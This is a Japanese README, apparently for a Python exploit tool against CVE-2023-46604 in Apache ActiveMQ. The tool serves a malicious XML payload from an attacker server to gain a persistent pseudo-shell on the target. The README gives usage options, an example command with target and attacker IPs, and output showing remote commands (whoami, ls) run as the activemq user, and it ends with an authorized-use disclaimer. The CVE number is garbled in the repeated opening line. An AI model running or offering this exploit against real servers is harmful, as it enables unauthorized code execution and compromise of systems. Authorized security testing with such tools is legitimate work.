
このスクリプトは、CVE-2023046604(Apache ActiveMQ)を利用して疑似シェルを生成します。この脆弱性は、OpenWireプロトコル内の安全でないデシリアライゼーションにより、リモートコード実行を可能にします。
このスクリプトは、CVE-2023046604 (Apache ActiveMQ) を利用して疑似シェルを生成します。この脆弱性は、OpenWire プロトコル内の安全でない逆シリアライゼーションにより、リモートコード実行を可能にします。
CVE-2023-46604 は、Apache ActiveMQ の OpenWire プロトコルに存在する逆シリアライゼーションの脆弱性です。この欠陥は、攻撃者が ActiveMQ が稼働しているサーバー上で任意のコードを実行するために悪用される可能性があります。攻撃者は悪意のある XML ファイルを作成でき、そのファイル内のコマンドがリモートサーバーによって実行されます。
このエクスプロイトは、XML ドキュメント作成のプロセスを自動化・抽象化し、ファイルを配信するための基本的なサーバーを提供し、POST 経由でターゲットサーバーから情報を受け取ります。これにより、リバースシェルを起動したりバイナリを展開したりする必要なく、継続的な悪用が可能になります。
エクスプロイトスクリプトを実行する前に、以下が整っていることを確認してください:
このスクリプトには以下が必要です:
オプション:
usage: exploit.py [-h] -i IP [-p PORT] -si SRVIP [-sp SRVPORT]
optional arguments:
-h, --help show this help message and exit
-i IP, --ip IP ActiveMQ Server IP or Hostname
-p PORT, --port PORT ActiveMQ Server Port, defaults to 61616
-si SRVIP, --srvip SRVIP
Serve IP
-sp SRVPORT, --srvport SRVPORT
Serve port, defaults to 8080
$python3 exploit.py -i 10.129.230.87 -p 61616 -si 10.10.14.59 -sp 8080
#################################################################################
# CVE-2023-46604 - Apache ActiveMQ - Remote Code Execution - Pseudo Shell #
# Exploit by Ducksec, Original POC by X1r0z, Python POC by evkl1d #
#################################################################################
[*] Target: 10.129.230.87:61616
[*] Serving XML at: http://10.10.14.59:8080/poc.xml
[!] This is a semi-interactive pseudo-shell, you cannot cd, but you can ls-lah / for example.
[*] Type 'exit' to quit
#################################################################################
# Not yet connected, send a command to test connection to host. #
# Prompt will change to Apache ActiveMQ$ once at least one response is received #
# Please note this is a one-off connection check, re-run the script if you #
# want to re-check the connection. #
#################################################################################
[Target not responding!]$ whoami
activemq
Apache ActiveMQ$ ls -lah
total 164K
drwxr-xr-x 5 activemq activemq 4.0K Nov 7 12:50 .
drwxr-xr-x 11 activemq activemq 4.0K Nov 6 01:18 ..
-rwxr-xr-x 1 activemq activemq 21K Apr 20 2021 activemq
-rwxr-xr-x 1 activemq activemq 6.1K Apr 20 2021 activemq-diag
-rw-r--r-- 1 activemq activemq 17K Apr 20 2021 activemq.jar
-rw-r--r-- 1 activemq activemq 5.5K Apr 20 2021 env
drwxr-xr-x 2 activemq activemq 4.0K Nov 5 00:13 linux-x86-32
drwxr-xr-x 2 activemq activemq 4.0K Nov 5 00:13 linux-x86-64
drwxr-xr-x 2 activemq activemq 4.0K Nov 5 00:13 macosx
-rw-r--r-- 1 activemq activemq 82K Apr 20 2021 wrapper.jar
Apache ActiveMQ$
このエクスプロイトは、X1r0z による Go 製のオリジナル POC と、evkl1d による Python POC を基に構築されています。
このコードは、教育目的および倫理的なセキュリティテストの目的でのみ提供されます。これは責任を持って使用され、明示的な許可が付与された環境でのみ使用されるべきです。無許可または悪意のある使用は固く禁止されています。このコードを使用することにより、お客様は該当する法域で適用されるすべての適用法、規制、および倫理基準を遵守することに同意したものとみなされます。作成者および貢献者は、このコードの誤用または無許可の使用から生じるいかなる損害や結果についても責任を負いません。